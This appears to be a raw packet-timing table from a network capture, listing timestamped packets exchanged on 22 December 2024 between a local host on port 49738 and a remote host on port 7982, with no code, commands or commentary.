                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.659909964 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660029888 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660075903 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660089970 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660151005 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660176039 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660248041 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660260916 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660299063 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660375118 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660389900 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660403967 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660428047 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660535097 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660547972 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660559893 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660569906 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660573006 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660586119 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660593987 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660599947 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660615921 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660811901 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660836935 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660851002 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660856009 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660862923 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660876036 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660882950 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.660907030 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.661183119 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.661197901 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.661237001 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.667371035 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.667429924 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.667442083 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.667479038 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.667558908 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.667571068 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.667579889 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.667591095 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.667607069 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.667788982 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.667800903 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.667812109 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.667824030 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.667833090 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.667836905 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.667857885 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.667872906 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.669125080 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.669686079 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.669698000 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.669722080 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.669850111 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.669919968 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.676018000 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.676147938 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.676157951 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.676168919 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.676191092 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.676227093 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.676265001 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.676275969 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.676280975 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.676286936 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.676321030 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.676503897 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.676516056 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.676548958 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.676610947 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.676624060 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.676667929 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.677429914 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.677475929 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.677856922 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.678580046 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.678772926 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.678828001 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.679733038 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.679744959 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.679780006 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.680775881 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.680999994 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.681113005 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.681938887 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.681951046 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.681994915 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.683041096 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.683182955 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.683218956 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.684211016 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.684221029 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.684247971 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.685249090 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.685607910 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.685718060 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.686412096 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.687551022 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.687563896 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.687586069 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.687705994 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.687752962 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.688667059 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.688678980 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.688714981 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.689687014 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.741622925 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.823168993 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.823400974 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.823756933 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.823802948 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.824049950 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.824101925 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.824860096 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.825182915 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.825251102 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.825970888 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.826237917 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.826345921 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.827100992 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.827299118 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.827337027 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.828202009 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.828537941 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.828581095 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.829364061 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.829752922 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.829855919 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.830447912 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.830640078 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.830678940 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.831582069 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.831707001 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.831764936 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.832701921 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.832803011 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.832918882 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.833816051 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.834351063 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.834394932 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.834990025 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.835001945 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.835051060 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.836042881 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.836225986 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.836261034 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.837150097 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.837354898 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.837399960 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.838299990 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.838547945 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.838606119 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.839416981 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.840193033 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.840246916 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.840501070 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.840939999 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.840991020 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.841634989 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.841937065 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.842549086 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.842756033 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.842973948 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.843013048 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.843861103 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.844134092 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.844268084 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.845172882 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.846051931 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.846098900 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.846159935 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.846174002 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.846210003 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.847234964 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.848078966 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.848133087 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.848375082 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.848552942 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.848603010 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.849469900 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.849695921 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.849730968 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.850579023 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.850898981 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.850972891 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.851735115 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.852180004 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.852225065 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.852916956 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.852929115 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.852961063 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.853960037 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.854135036 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.854273081 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.855082035 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.855207920 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.855776072 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.856190920 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.856645107 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.856683016 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.857346058 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.857436895 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.857481003 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.858427048 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.858967066 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.859004021 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.859545946 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.859761953 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.859808922 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.860660076 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.860866070 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.860927105 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.861763954 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.861896992 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.861948013 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.862895966 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.863002062 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.863059044 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.864032030 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.864145041 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.864670038 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.865123987 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.865235090 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.865309000 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.866242886 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.866377115 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.867145061 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.867367983 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.868215084 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.868275881 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.868645906 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.868659019 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.868719101 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.869611025 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.869740009 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.869792938 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.870740891 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.870896101 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.870980978 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.871860981 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.872127056 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.872489929 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.872968912 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.873560905 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.873689890 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.874078989 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.874195099 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.874771118 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.875202894 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.876264095 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.876312017 CET497387982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.876358032 CET798249738104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:02.876368046 CET798249738104.37.175.218192.168.2.4
